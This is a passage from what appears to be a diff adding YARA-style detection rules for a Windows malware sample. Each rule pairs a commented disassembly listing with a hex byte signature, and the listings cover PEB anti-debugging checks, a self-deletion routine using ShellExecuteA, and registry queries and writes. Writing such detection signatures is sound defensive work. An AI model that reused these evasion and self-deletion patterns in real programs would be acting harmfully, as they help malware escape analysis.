.text:0x004021fa 85c0 test eax,eax + .text:0x004021fc 7405 jz 0x00402203 + */ + $c14 = { 55 8B EC 81 EC 1C 06 00 00 53 56 57 C7 85 ?? ?? ?? ?? 00 00 00 00 C7 85 ?? ?? ?? ?? 00 00 00 00 C7 85 ?? ?? ?? ?? 00 00 00 00 C7 85 ?? ?? ?? ?? 00 00 00 00 64 A1 ?? ?? ?? ?? 8A 58 ?? 88 9D ?? ?? ?? ?? 0F BE 85 ?? ?? ?? ?? 85 C0 74 ?? 
} + /* +Basic Block at 0x00402440@7faafc7e4a5c736ebfee6abbbc812d80 with 1 features: + - check for PEB BeingDebugged flag + .text:0x00402440 + .text:0x00402440 FUNC: int cdecl sub_00402440( ) [6 XREFS] + .text:0x00402440 + .text:0x00402440 Stack Variables: (offset from initial top of stack) + .text:0x00402440 -8: int local8 + .text:0x00402440 -12: int local12 + .text:0x00402440 -16: int local16 + .text:0x00402440 -20: int local20 + .text:0x00402440 + .text:0x00402440 55 push ebp + .text:0x00402441 8bec mov ebp,esp + .text:0x00402443 83ec10 sub esp,16 + .text:0x00402446 53 push ebx + .text:0x00402447 56 push esi + .text:0x00402448 57 push edi + .text:0x00402449 c745f400000000 mov dword [ebp - 12],0 + .text:0x00402450 c745f000000000 mov dword [ebp - 16],0 + .text:0x00402457 64a130000000 fs: mov eax,dword [0x00000030] + .text:0x0040245d 8a5802 mov bl,byte [eax + 2] + .text:0x00402460 885df8 mov byte [ebp - 8],bl + .text:0x00402463 0fbe45f8 movsx eax,byte [ebp - 8] + .text:0x00402467 85c0 test eax,eax + .text:0x00402469 7405 jz 0x00402470 + */ + $c15 = { 55 8B EC 83 EC 10 53 56 57 C7 45 ?? 00 00 00 00 C7 45 ?? 00 00 00 00 64 A1 ?? ?? ?? ?? 8A 58 ?? 88 5D ?? 0F BE 45 ?? 85 C0 74 ?? 
} + /* +Basic Block at 0x00402650@7faafc7e4a5c736ebfee6abbbc812d80 with 1 features: + - check for PEB BeingDebugged flag + .text:0x00402650 + .text:0x00402650 FUNC: int cdecl sub_00402650( int arg0, int arg1, ) [2 XREFS] + .text:0x00402650 + .text:0x00402650 Stack Variables: (offset from initial top of stack) + .text:0x00402650 8: int arg1 + .text:0x00402650 4: int arg0 + .text:0x00402650 -4100: int local4100 + .text:0x00402650 -4104: int local4104 + .text:0x00402650 -4120: int local4120 + .text:0x00402650 -4124: int local4124 + .text:0x00402650 -4128: int local4128 + .text:0x00402650 -4132: int local4132 + .text:0x00402650 -5156: int local5156 + .text:0x00402650 -5160: int local5160 + .text:0x00402650 -5164: int local5164 + .text:0x00402650 -5168: int local5168 + .text:0x00402650 -5172: int local5172 + .text:0x00402650 + .text:0x00402650 55 push ebp + .text:0x00402651 8bec mov ebp,esp + .text:0x00402653 b830140000 mov eax,0x00001430 + .text:0x00402658 e813130000 call 0x00403970 ;__alloca_probe() + .text:0x0040265d 53 push ebx + .text:0x0040265e 56 push esi + .text:0x0040265f 57 push edi + .text:0x00402660 c785e4efffff0010 mov dword [ebp - 4124],0x00001000 + .text:0x0040266a c785d4ebffff0000 mov dword [ebp - 5164],0 + .text:0x00402674 c785d0ebffff0000 mov dword [ebp - 5168],0 + .text:0x0040267e 64a130000000 fs: mov eax,dword [0x00000030] + .text:0x00402684 8a5802 mov bl,byte [eax + 2] + .text:0x00402687 889dd8ebffff mov byte [ebp - 5160],bl + .text:0x0040268d 0fbe85d8ebffff movsx eax,byte [ebp - 5160] + .text:0x00402694 85c0 test eax,eax + .text:0x00402696 7405 jz 0x0040269d + */ + $c16 = { 55 8B EC B8 30 14 00 00 E8 ?? ?? ?? ?? 53 56 57 C7 85 ?? ?? ?? ?? 00 10 00 00 C7 85 ?? ?? ?? ?? 00 00 00 00 C7 85 ?? ?? ?? ?? 00 00 00 00 64 A1 ?? ?? ?? ?? 8A 58 ?? 88 9D ?? ?? ?? ?? 0F BE 85 ?? ?? ?? ?? 85 C0 74 ?? 
} + /* +Basic Block at 0x00402880@7faafc7e4a5c736ebfee6abbbc812d80 with 1 features: + - check for PEB BeingDebugged flag + .text:0x00402880 + .text:0x00402880 FUNC: int cdecl sub_00402880( int arg0, ) [2 XREFS] + .text:0x00402880 + .text:0x00402880 Stack Variables: (offset from initial top of stack) + .text:0x00402880 4: int arg0 + .text:0x00402880 -1028: int local1028 + .text:0x00402880 -1032: int local1032 + .text:0x00402880 -1036: int local1036 + .text:0x00402880 -1040: int local1040 + .text:0x00402880 -1044: int local1044 + .text:0x00402880 -1048: int local1048 + .text:0x00402880 -1052: int local1052 + .text:0x00402880 -1056: int local1056 + .text:0x00402880 -1060: int local1060 + .text:0x00402880 -1064: int local1064 + .text:0x00402880 -1068: int local1068 + .text:0x00402880 -1072: int local1072 + .text:0x00402880 -1076: int local1076 + .text:0x00402880 + .text:0x00402880 55 push ebp + .text:0x00402881 8bec mov ebp,esp + .text:0x00402883 81ec30040000 sub esp,1072 + .text:0x00402889 53 push ebx + .text:0x0040288a 56 push esi + .text:0x0040288b 57 push edi + .text:0x0040288c c785d4fbffff0000 mov dword [ebp - 1068],0 + .text:0x00402896 c785d0fbffff0000 mov dword [ebp - 1072],0 + .text:0x004028a0 64a130000000 fs: mov eax,dword [0x00000030] + .text:0x004028a6 8a5802 mov bl,byte [eax + 2] + .text:0x004028a9 889dd8fbffff mov byte [ebp - 1064],bl + .text:0x004028af 0fbe85d8fbffff movsx eax,byte [ebp - 1064] + .text:0x004028b6 85c0 test eax,eax + .text:0x004028b8 7405 jz 0x004028bf + */ + $c17 = { 55 8B EC 81 EC 30 04 00 00 53 56 57 C7 85 ?? ?? ?? ?? 00 00 00 00 C7 85 ?? ?? ?? ?? 00 00 00 00 64 A1 ?? ?? ?? ?? 8A 58 ?? 88 9D ?? ?? ?? ?? 0F BE 85 ?? ?? ?? ?? 85 C0 74 ?? 
} + /* +Basic Block at 0x00402f40@7faafc7e4a5c736ebfee6abbbc812d80 with 1 features: + - check for PEB BeingDebugged flag + .text:0x00402f40 + .text:0x00402f40 FUNC: int cdecl sub_00402f40( int arg0, ) [4 XREFS] + .text:0x00402f40 + .text:0x00402f40 Stack Variables: (offset from initial top of stack) + .text:0x00402f40 4: int arg0 + .text:0x00402f40 -1028: int local1028 + .text:0x00402f40 -1032: int local1032 + .text:0x00402f40 -2056: int local2056 + .text:0x00402f40 -3080: int local3080 + .text:0x00402f40 -4104: int local4104 + .text:0x00402f40 -5128: int local5128 + .text:0x00402f40 -5132: int local5132 + .text:0x00402f40 -5136: int local5136 + .text:0x00402f40 -5140: int local5140 + .text:0x00402f40 -5144: int local5144 + .text:0x00402f40 + .text:0x00402f40 55 push ebp + .text:0x00402f41 8bec mov ebp,esp + .text:0x00402f43 b814140000 mov eax,0x00001414 + .text:0x00402f48 e8230a0000 call 0x00403970 ;__alloca_probe() + .text:0x00402f4d 53 push ebx + .text:0x00402f4e 56 push esi + .text:0x00402f4f 57 push edi + .text:0x00402f50 c785f0ebffff0000 mov dword [ebp - 5136],0 + .text:0x00402f5a c785ecebffff0000 mov dword [ebp - 5140],0 + .text:0x00402f64 64a130000000 fs: mov eax,dword [0x00000030] + .text:0x00402f6a 8a5802 mov bl,byte [eax + 2] + .text:0x00402f6d 889df4ebffff mov byte [ebp - 5132],bl + .text:0x00402f73 0fbe85f4ebffff movsx eax,byte [ebp - 5132] + .text:0x00402f7a 85c0 test eax,eax + .text:0x00402f7c 7405 jz 0x00402f83 + */ + $c18 = { 55 8B EC B8 14 14 00 00 E8 ?? ?? ?? ?? 53 56 57 C7 85 ?? ?? ?? ?? 00 00 00 00 C7 85 ?? ?? ?? ?? 00 00 00 00 64 A1 ?? ?? ?? ?? 8A 58 ?? 88 9D ?? ?? ?? ?? 0F BE 85 ?? ?? ?? ?? 85 C0 74 ?? 
} + /* +Basic Block at 0x004032c0@7faafc7e4a5c736ebfee6abbbc812d80 with 1 features: + - check for PEB BeingDebugged flag + .text:0x004032c0 + .text:0x004032c0 FUNC: int cdecl sub_004032c0( int arg0, ) [4 XREFS] + .text:0x004032c0 + .text:0x004032c0 Stack Variables: (offset from initial top of stack) + .text:0x004032c0 4: int arg0 + .text:0x004032c0 -1028: int local1028 + .text:0x004032c0 -1032: int local1032 + .text:0x004032c0 -2056: int local2056 + .text:0x004032c0 -3080: int local3080 + .text:0x004032c0 -3084: int local3084 + .text:0x004032c0 -3088: int local3088 + .text:0x004032c0 -3092: int local3092 + .text:0x004032c0 -3096: int local3096 + .text:0x004032c0 + .text:0x004032c0 55 push ebp + .text:0x004032c1 8bec mov ebp,esp + .text:0x004032c3 81ec140c0000 sub esp,3092 + .text:0x004032c9 53 push ebx + .text:0x004032ca 56 push esi + .text:0x004032cb 57 push edi + .text:0x004032cc c785f0f3ffff0000 mov dword [ebp - 3088],0 + .text:0x004032d6 c785ecf3ffff0000 mov dword [ebp - 3092],0 + .text:0x004032e0 64a130000000 fs: mov eax,dword [0x00000030] + .text:0x004032e6 8a5802 mov bl,byte [eax + 2] + .text:0x004032e9 889df4f3ffff mov byte [ebp - 3084],bl + .text:0x004032ef 0fbe85f4f3ffff movsx eax,byte [ebp - 3084] + .text:0x004032f6 85c0 test eax,eax + .text:0x004032f8 7405 jz 0x004032ff + */ + $c19 = { 55 8B EC 81 EC 14 0C 00 00 53 56 57 C7 85 ?? ?? ?? ?? 00 00 00 00 C7 85 ?? ?? ?? ?? 00 00 00 00 64 A1 ?? ?? ?? ?? 8A 58 ?? 88 9D ?? ?? ?? ?? 0F BE 85 ?? ?? ?? ?? 85 C0 74 ?? 
} + /* +Basic Block at 0x00403530@7faafc7e4a5c736ebfee6abbbc812d80 with 1 features: + - check for PEB BeingDebugged flag + .text:0x00403530 + .text:0x00403530 FUNC: int cdecl sub_00403530( int arg0, int arg1, ) [2 XREFS] + .text:0x00403530 + .text:0x00403530 Stack Variables: (offset from initial top of stack) + .text:0x00403530 8: int arg1 + .text:0x00403530 4: int arg0 + .text:0x00403530 -8: int local8 + .text:0x00403530 -1032: int local1032 + .text:0x00403530 -1036: int local1036 + .text:0x00403530 -2060: int local2060 + .text:0x00403530 -2064: int local2064 + .text:0x00403530 -2068: int local2068 + .text:0x00403530 -2072: int local2072 + .text:0x00403530 -2076: int local2076 + .text:0x00403530 -2080: int local2080 + .text:0x00403530 -3104: int local3104 + .text:0x00403530 -4128: int local4128 + .text:0x00403530 -5152: int local5152 + .text:0x00403530 -6176: int local6176 + .text:0x00403530 -6180: int local6180 + .text:0x00403530 -6184: int local6184 + .text:0x00403530 -6188: int local6188 + .text:0x00403530 -6192: int local6192 + .text:0x00403530 -6196: int local6196 + .text:0x00403530 -6200: int local6200 + .text:0x00403530 -6204: int local6204 + .text:0x00403530 + .text:0x00403530 55 push ebp + .text:0x00403531 8bec mov ebp,esp + .text:0x00403533 b838180000 mov eax,0x00001838 + .text:0x00403538 e833040000 call 0x00403970 ;__alloca_probe() + .text:0x0040353d 53 push ebx + .text:0x0040353e 56 push esi + .text:0x0040353f 57 push edi + .text:0x00403540 c785dce7ffff0000 mov dword [ebp - 6180],0 + .text:0x0040354a c785d8e7ffff0000 mov dword [ebp - 6184],0 + .text:0x00403554 64a130000000 fs: mov eax,dword [0x00000030] + .text:0x0040355a 8a5802 mov bl,byte [eax + 2] + .text:0x0040355d 889de0e7ffff mov byte [ebp - 6176],bl + .text:0x00403563 0fbe85e0e7ffff movsx eax,byte [ebp - 6176] + .text:0x0040356a 85c0 test eax,eax + .text:0x0040356c 7405 jz 0x00403573 + */ + $c20 = { 55 8B EC B8 38 18 00 00 E8 ?? ?? ?? ?? 53 56 57 C7 85 ?? ?? ?? ?? 00 00 00 00 C7 85 ?? ?? ?? ?? 
00 00 00 00 64 A1 ?? ?? ?? ?? 8A 58 ?? 88 9D ?? ?? ?? ?? 0F BE 85 ?? ?? ?? ?? 85 C0 74 ?? } + /* +Basic Block at 0x00401000@7faafc7e4a5c736ebfee6abbbc812d80 with 1 features: + - create process on Windows + .text:0x00401000 Segment: .text (40960 bytes) + .text:0x00401000 + .text:0x00401000 FUNC: int cdecl sub_00401000( ) [158 XREFS] + .text:0x00401000 + .text:0x00401000 Stack Variables: (offset from initial top of stack) + .text:0x00401000 -264: int local264 + .text:0x00401000 -524: int local524 + .text:0x00401000 + .text:0x00401000 55 push ebp + .text:0x00401001 8bec mov ebp,esp + .text:0x00401003 81ec08020000 sub esp,520 + .text:0x00401009 53 push ebx + .text:0x0040100a 56 push esi + .text:0x0040100b 57 push edi + .text:0x0040100c 6804010000 push 260 + .text:0x00401011 8d85f8fdffff lea eax,dword [ebp - 520] + .text:0x00401017 50 push eax + .text:0x00401018 6a00 push 0 + .text:0x0040101a ff155cb04000 call dword [0x0040b05c] ;kernel32.GetModuleFileNameA(0,local524,260) + .text:0x00401020 6804010000 push 260 + .text:0x00401025 8d8df8fdffff lea ecx,dword [ebp - 520] + .text:0x0040102b 51 push ecx + .text:0x0040102c 8d95f8fdffff lea edx,dword [ebp - 520] + .text:0x00401032 52 push edx + .text:0x00401033 ff1564b04000 call dword [0x0040b064] ;kernel32.GetShortPathNameA(local524,local524,260) + .text:0x00401039 bf40c04000 mov edi,0x0040c040 + .text:0x0040103e 8d95fcfeffff lea edx,dword [ebp - 260] + .text:0x00401044 83c9ff or ecx,0xffffffff + .text:0x00401047 33c0 xor eax,eax + .text:0x00401049 f2ae repnz: scasb + .text:0x0040104b f7d1 not ecx + .text:0x0040104d 2bf9 sub edi,ecx + .text:0x0040104f 8bf7 mov esi,edi + .text:0x00401051 8bc1 mov eax,ecx + .text:0x00401053 8bfa mov edi,edx + .text:0x00401055 c1e902 shr ecx,2 + .text:0x00401058 f3a5 rep: movsd + .text:0x0040105a 8bc8 mov ecx,eax + .text:0x0040105c 83e103 and ecx,3 + .text:0x0040105f f3a4 rep: movsb + .text:0x00401061 8dbdf8fdffff lea edi,dword [ebp - 520] + .text:0x00401067 8d95fcfeffff lea edx,dword [ebp - 
260] + .text:0x0040106d 83c9ff or ecx,0xffffffff + .text:0x00401070 33c0 xor eax,eax + .text:0x00401072 f2ae repnz: scasb + .text:0x00401074 f7d1 not ecx + .text:0x00401076 2bf9 sub edi,ecx + .text:0x00401078 8bf7 mov esi,edi + .text:0x0040107a 8bd9 mov ebx,ecx + .text:0x0040107c 8bfa mov edi,edx + .text:0x0040107e 83c9ff or ecx,0xffffffff + .text:0x00401081 33c0 xor eax,eax + .text:0x00401083 f2ae repnz: scasb + .text:0x00401085 83c7ff add edi,0xffffffff + .text:0x00401088 8bcb mov ecx,ebx + .text:0x0040108a c1e902 shr ecx,2 + .text:0x0040108d f3a5 rep: movsd + .text:0x0040108f 8bcb mov ecx,ebx + .text:0x00401091 83e103 and ecx,3 + .text:0x00401094 f3a4 rep: movsb + .text:0x00401096 bf38c04000 mov edi,0x0040c038 + .text:0x0040109b 8d95fcfeffff lea edx,dword [ebp - 260] + .text:0x004010a1 83c9ff or ecx,0xffffffff + .text:0x004010a4 33c0 xor eax,eax + .text:0x004010a6 f2ae repnz: scasb + .text:0x004010a8 f7d1 not ecx + .text:0x004010aa 2bf9 sub edi,ecx + .text:0x004010ac 8bf7 mov esi,edi + .text:0x004010ae 8bd9 mov ebx,ecx + .text:0x004010b0 8bfa mov edi,edx + .text:0x004010b2 83c9ff or ecx,0xffffffff + .text:0x004010b5 33c0 xor eax,eax + .text:0x004010b7 f2ae repnz: scasb + .text:0x004010b9 83c7ff add edi,0xffffffff + .text:0x004010bc 8bcb mov ecx,ebx + .text:0x004010be c1e902 shr ecx,2 + .text:0x004010c1 f3a5 rep: movsd + .text:0x004010c3 8bcb mov ecx,ebx + .text:0x004010c5 83e103 and ecx,3 + .text:0x004010c8 f3a4 rep: movsb + .text:0x004010ca 6a00 push 0 + .text:0x004010cc 6a00 push 0 + .text:0x004010ce 8d85fcfeffff lea eax,dword [ebp - 260] + .text:0x004010d4 50 push eax + .text:0x004010d5 6830c04000 push 0x0040c030 + .text:0x004010da 6a00 push 0 + .text:0x004010dc 6a00 push 0 + .text:0x004010de ff1538b14000 call dword [0x0040b138] ;shell32.ShellExecuteA(0,0,0x0040c030,local264,0,0) + .text:0x004010e4 6a00 push 0 + .text:0x004010e6 e879270000 call 0x00403864 ;_exit(0) + .text:0x004010eb 5f pop edi + .text:0x004010ec 5e pop esi + .text:0x004010ed 5b pop ebx + 
.text:0x004010ee 8be5 mov esp,ebp + .text:0x004010f0 5d pop ebp + .text:0x004010f1 c3 ret + */ + $c21 = { 55 8B EC 81 EC 08 02 00 00 53 56 57 68 04 01 00 00 8D 85 ?? ?? ?? ?? 50 6A 00 FF 15 ?? ?? ?? ?? 68 04 01 00 00 8D 8D ?? ?? ?? ?? 51 8D 95 ?? ?? ?? ?? 52 FF 15 ?? ?? ?? ?? BF 40 C0 40 00 8D 95 ?? ?? ?? ?? 83 C9 FF 33 C0 F2 AE F7 D1 2B F9 8B F7 8B C1 8B FA C1 E9 02 F3 A5 8B C8 83 E1 03 F3 A4 8D BD ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? 83 C9 FF 33 C0 F2 AE F7 D1 2B F9 8B F7 8B D9 8B FA 83 C9 FF 33 C0 F2 AE 83 C7 FF 8B CB C1 E9 02 F3 A5 8B CB 83 E1 03 F3 A4 BF 38 C0 40 00 8D 95 ?? ?? ?? ?? 83 C9 FF 33 C0 F2 AE F7 D1 2B F9 8B F7 8B D9 8B FA 83 C9 FF 33 C0 F2 AE 83 C7 FF 8B CB C1 E9 02 F3 A5 8B CB 83 E1 03 F3 A4 6A 00 6A 00 8D 85 ?? ?? ?? ?? 50 68 30 C0 40 00 6A 00 6A 00 FF 15 ?? ?? ?? ?? 6A 00 E8 ?? ?? ?? ?? 5F 5E 5B 8B E5 5D C3 } + /* +function at 0x00401100@7faafc7e4a5c736ebfee6abbbc812d80 with 2 features: + - check for PEB NtGlobalFlag flag + - query or enumerate registry value + .text:0x00401100 + .text:0x00401100 FUNC: int cdecl sub_00401100( ) [2 XREFS] + .text:0x00401100 + .text:0x00401100 Stack Variables: (offset from initial top of stack) + .text:0x00401100 -8: int local8 + .text:0x00401100 -12: int local12 + .text:0x00401100 -16: int local16 + .text:0x00401100 -20: int local20 + .text:0x00401100 -24: int local24 + .text:0x00401100 + .text:0x00401100 55 push ebp + .text:0x00401101 8bec mov ebp,esp + .text:0x00401103 83ec14 sub esp,20 + .text:0x00401106 53 push ebx + .text:0x00401107 56 push esi + .text:0x00401108 57 push edi + .text:0x00401109 c745f000000000 mov dword [ebp - 16],0 + .text:0x00401110 c745ec00000000 mov dword [ebp - 20],0 + .text:0x00401117 64a130000000 fs: mov eax,dword [0x00000030] + .text:0x0040111d 8a5802 mov bl,byte [eax + 2] + .text:0x00401120 885df4 mov byte [ebp - 12],bl + .text:0x00401123 0fbe45f4 movsx eax,byte [ebp - 12] + .text:0x00401127 85c0 test eax,eax + .text:0x00401129 7405 jz 0x00401130 + .text:0x0040112b e8d0feffff call 0x00401000 
;sub_00401000() + .text:0x00401130 loc_00401130: [1 XREFS] + .text:0x00401130 64a130000000 fs: mov eax,dword [0x00000030] + .text:0x00401136 8b4018 mov eax,dword [eax + 24] + .text:0x00401139 3e8b4010 ds: mov eax,dword [eax + 16] + .text:0x0040113d 8945f0 mov dword [ebp - 16],eax + .text:0x00401140 837df000 cmp dword [ebp - 16],0 + .text:0x00401144 7405 jz 0x0040114b + .text:0x00401146 e8b5feffff call 0x00401000 ;sub_00401000() + .text:0x0040114b loc_0040114b: [1 XREFS] + .text:0x0040114b 64a130000000 fs: mov eax,dword [0x00000030] + .text:0x00401151 3e8b4068 ds: mov eax,dword [eax + 104] + .text:0x00401155 83e870 sub eax,112 + .text:0x00401158 8945ec mov dword [ebp - 20],eax + .text:0x0040115b 837dec00 cmp dword [ebp - 20],0 + .text:0x0040115f 7505 jnz 0x00401166 + .text:0x00401161 e89afeffff call 0x00401000 ;sub_00401000() + .text:0x00401166 loc_00401166: [1 XREFS] + .text:0x00401166 8d4df8 lea ecx,dword [ebp - 8] + .text:0x00401169 51 push ecx + .text:0x0040116a 683f000f00 push 0x000f003f + .text:0x0040116f 6a00 push 0 + .text:0x00401171 6858c04000 push 0x0040c058 + .text:0x00401176 6802000080 push 0x80000002 + .text:0x0040117b ff1520b04000 call dword [0x0040b020] ;advapi32.RegOpenKeyExA(0x80000002,0x0040c058,0,0x000f003f,local12) + .text:0x00401181 85c0 test eax,eax + .text:0x00401183 7404 jz 0x00401189 + .text:0x00401185 33c0 xor eax,eax + .text:0x00401187 eb3d jmp 0x004011c6 + .text:0x00401189 loc_00401189: [1 XREFS] + .text:0x00401189 6a00 push 0 + .text:0x0040118b 6a00 push 0 + .text:0x0040118d 6a00 push 0 + .text:0x0040118f 6a00 push 0 + .text:0x00401191 6848c04000 push 0x0040c048 + .text:0x00401196 8b55f8 mov edx,dword [ebp - 8] + .text:0x00401199 52 push edx + .text:0x0040119a ff1524b04000 call dword [0x0040b024] ;advapi32.RegQueryValueExA(0xfefefefe,0x0040c048,0,0,0,0) + .text:0x004011a0 8945fc mov dword [ebp - 4],eax + .text:0x004011a3 837dfc00 cmp dword [ebp - 4],0 + .text:0x004011a7 740e jz 0x004011b7 + .text:0x004011a9 8b45f8 mov eax,dword [ebp - 8] 
+ .text:0x004011ac 50 push eax + .text:0x004011ad ff1558b04000 call dword [0x0040b058] ;kernel32.CloseHandle(0xfefefefe) + .text:0x004011b3 33c0 xor eax,eax + .text:0x004011b5 eb0f jmp 0x004011c6 + .text:0x004011b7 loc_004011b7: [1 XREFS] + .text:0x004011b7 8b4df8 mov ecx,dword [ebp - 8] + .text:0x004011ba 51 push ecx + .text:0x004011bb ff1558b04000 call dword [0x0040b058] ;kernel32.CloseHandle(0xfefefefe) + .text:0x004011c1 b801000000 mov eax,1 + .text:0x004011c6 loc_004011c6: [2 XREFS] + .text:0x004011c6 5f pop edi + .text:0x004011c7 5e pop esi + .text:0x004011c8 5b pop ebx + .text:0x004011c9 8be5 mov esp,ebp + .text:0x004011cb 5d pop ebp + .text:0x004011cc c3 ret + */ + $c22 = { 55 8B EC 83 EC 14 53 56 57 C7 45 ?? 00 00 00 00 C7 45 ?? 00 00 00 00 64 A1 ?? ?? ?? ?? 8A 58 ?? 88 5D ?? 0F BE 45 ?? 85 C0 74 ?? E8 ?? ?? ?? ?? 64 A1 ?? ?? ?? ?? 8B 40 ?? 3E 8B 40 ?? 89 45 ?? 83 7D ?? 00 74 ?? E8 ?? ?? ?? ?? 64 A1 ?? ?? ?? ?? 3E 8B 40 ?? 83 E8 70 89 45 ?? 83 7D ?? 00 75 ?? E8 ?? ?? ?? ?? 8D 4D ?? 51 68 3F 00 0F 00 6A 00 68 58 C0 40 00 68 02 00 00 80 FF 15 ?? ?? ?? ?? 85 C0 74 ?? 33 C0 EB ?? 6A 00 6A 00 6A 00 6A 00 68 48 C0 40 00 8B 55 ?? 52 FF 15 ?? ?? ?? ?? 89 45 ?? 83 7D ?? 00 74 ?? 8B 45 ?? 50 FF 15 ?? ?? ?? ?? 33 C0 EB ?? 8B 4D ?? 51 FF 15 ?? ?? ?? ?? 
B8 01 00 00 00 5F 5E 5B 8B E5 5D C3 } + /* +function at 0x004011d0@7faafc7e4a5c736ebfee6abbbc812d80 with 2 features: + - check for PEB NtGlobalFlag flag + - set registry value + .text:0x004011d0 + .text:0x004011d0 FUNC: int cdecl sub_004011d0( int arg0, int arg1, int arg2, int arg3, ) [6 XREFS] + .text:0x004011d0 + .text:0x004011d0 Stack Variables: (offset from initial top of stack) + .text:0x004011d0 16: int arg3 + .text:0x004011d0 12: int arg2 + .text:0x004011d0 8: int arg1 + .text:0x004011d0 4: int arg0 + .text:0x004011d0 -8: int local8 + .text:0x004011d0 -4108: int local4108 + .text:0x004011d0 -4112: int local4112 + .text:0x004011d0 -4116: int local4116 + .text:0x004011d0 -4120: int local4120 + .text:0x004011d0 -4124: int local4124 + .text:0x004011d0 + .text:0x004011d0 55 push ebp + .text:0x004011d1 8bec mov ebp,esp + .text:0x004011d3 b818100000 mov eax,0x00001018 + .text:0x004011d8 e893270000 call 0x00403970 ;__alloca_probe() + .text:0x004011dd 53 push ebx + .text:0x004011de 56 push esi + .text:0x004011df 57 push edi + .text:0x004011e0 c785ecefffff0000 mov dword [ebp - 4116],0 + .text:0x004011ea c785e8efffff0000 mov dword [ebp - 4120],0 + .text:0x004011f4 64a130000000 fs: mov eax,dword [0x00000030] + .text:0x004011fa 8a5802 mov bl,byte [eax + 2] + .text:0x004011fd 889df0efffff mov byte [ebp - 4112],bl + .text:0x00401203 0fbe85f0efffff movsx eax,byte [ebp - 4112] + .text:0x0040120a 85c0 test eax,eax + .text:0x0040120c 7405 jz 0x00401213 + .text:0x0040120e e8edfdffff call 0x00401000 ;sub_00401000() + .text:0x00401213 loc_00401213: [1 XREFS] + .text:0x00401213 64a130000000 fs: mov eax,dword [0x00000030] + .text:0x00401219 8b4018 mov eax,dword [eax + 24] + .text:0x0040121c 3e8b4010 ds: mov eax,dword [eax + 16] + .text:0x00401220 8985ecefffff mov dword [ebp - 4116],eax + .text:0x00401226 83bdecefffff00 cmp dword [ebp - 4116],0 + .text:0x0040122d 7405 jz 0x00401234 + .text:0x0040122f e8ccfdffff call 0x00401000 ;sub_00401000() + .text:0x00401234 loc_00401234: [1 
XREFS] + .text:0x00401234 64a130000000 fs: mov eax,dword [0x00000030] + .text:0x0040123a 3e8b4068 ds: mov eax,dword [eax + 104] + .text:0x0040123e 83e870 sub eax,112 + .text:0x00401241 8985e8efffff mov dword [ebp - 4120],eax + .text:0x00401247 83bde8efffff00 cmp dword [ebp - 4120],0 + .text:0x0040124e 7505 jnz 0x00401255 + .text:0x00401250 e8abfdffff call 0x00401000 ;sub_00401000() + .text:0x00401255 loc_00401255: [1 XREFS] + .text:0x00401255 b900040000 mov ecx,1024 + .text:0x0040125a 33c0 xor eax,eax + .text:0x0040125c 8dbdf8efffff lea edi,dword [ebp - 4104] + .text:0x00401262 f3ab rep: stosd + .text:0x00401264 aa stosb + .text:0x00401265 8d8df8efffff lea ecx,dword [ebp - 4104] + .text:0x0040126b 894dfc mov dword [ebp - 4],ecx + .text:0x0040126e 8b7d08 mov edi,dword [ebp + 8] + .text:0x00401271 8b55fc mov edx,dword [ebp - 4] + .text:0x00401274 83c9ff or ecx,0xffffffff + .text:0x00401277 33c0 xor eax,eax + .text:0x00401279 f2ae repnz: scasb + .text:0x0040127b f7d1 not ecx + .text:0x0040127d 2bf9 sub edi,ecx + .text:0x0040127f 8bf7 mov esi,edi + .text:0x00401281 8bc1 mov eax,ecx + .text:0x00401283 8bfa mov edi,edx + .text:0x00401285 c1e902 shr ecx,2 + .text:0x00401288 f3a5 rep: movsd + .text:0x0040128a 8bc8 mov ecx,eax + .text:0x0040128c 83e103 and ecx,3 + .text:0x0040128f f3a4 rep: movsb + .text:0x00401291 8b7d08 mov edi,dword [ebp + 8] + .text:0x00401294 83c9ff or ecx,0xffffffff + .text:0x00401297 33c0 xor eax,eax + .text:0x00401299 f2ae repnz: scasb + .text:0x0040129b f7d1 not ecx + .text:0x0040129d 83c1ff add ecx,0xffffffff + .text:0x004012a0 8b55fc mov edx,dword [ebp - 4] + .text:0x004012a3 8d440a01 lea eax,dword [edx + ecx + 1] + .text:0x004012a7 8945fc mov dword [ebp - 4],eax + .text:0x004012aa 8b7d0c mov edi,dword [ebp + 12] + .text:0x004012ad 8b55fc mov edx,dword [ebp - 4] + .text:0x004012b0 83c9ff or ecx,0xffffffff + .text:0x004012b3 33c0 xor eax,eax + .text:0x004012b5 f2ae repnz: scasb + .text:0x004012b7 f7d1 not ecx + .text:0x004012b9 2bf9 sub edi,ecx + 
.text:0x004012bb 8bf7 mov esi,edi + .text:0x004012bd 8bc1 mov eax,ecx + .text:0x004012bf 8bfa mov edi,edx + .text:0x004012c1 c1e902 shr ecx,2 + .text:0x004012c4 f3a5 rep: movsd + .text:0x004012c6 8bc8 mov ecx,eax + .text:0x004012c8 83e103 and ecx,3 + .text:0x004012cb f3a4 rep: movsb + .text:0x004012cd 8b7d0c mov edi,dword [ebp + 12] + .text:0x004012d0 83c9ff or ecx,0xffffffff + .text:0x004012d3 33c0 xor eax,eax + .text:0x004012d5 f2ae repnz: scasb + .text:0x004012d7 f7d1 not ecx + .text:0x004012d9 83c1ff add ecx,0xffffffff + .text:0x004012dc 8b55fc mov edx,dword [ebp - 4] + .text:0x004012df 8d440a01 lea eax,dword [edx + ecx + 1] + .text:0x004012e3 8945fc mov dword [ebp - 4],eax + .text:0x004012e6 8b7d10 mov edi,dword [ebp + 16] + .text:0x004012e9 8b55fc mov edx,dword [ebp - 4] + .text:0x004012ec 83c9ff or ecx,0xffffffff + .text:0x004012ef 33c0 xor eax,eax + .text:0x004012f1 f2ae repnz: scasb + .text:0x004012f3 f7d1 not ecx + .text:0x004012f5 2bf9 sub edi,ecx + .text:0x004012f7 8bf7 mov esi,edi + .text:0x004012f9 8bc1 mov eax,ecx + .text:0x004012fb 8bfa mov edi,edx + .text:0x004012fd c1e902 shr ecx,2 + .text:0x00401300 f3a5 rep: movsd + .text:0x00401302 8bc8 mov ecx,eax + .text:0x00401304 83e103 and ecx,3 + .text:0x00401307 f3a4 rep: movsb + .text:0x00401309 8b7d10 mov edi,dword [ebp + 16] + .text:0x0040130c 83c9ff or ecx,0xffffffff + .text:0x0040130f 33c0 xor eax,eax + .text:0x00401311 f2ae repnz: scasb + .text:0x00401313 f7d1 not ecx + .text:0x00401315 83c1ff add ecx,0xffffffff + .text:0x00401318 8b55fc mov edx,dword [ebp - 4] + .text:0x0040131b 8d440a01 lea eax,dword [edx + ecx + 1] + .text:0x0040131f 8945fc mov dword [ebp - 4],eax + .text:0x00401322 8b7d14 mov 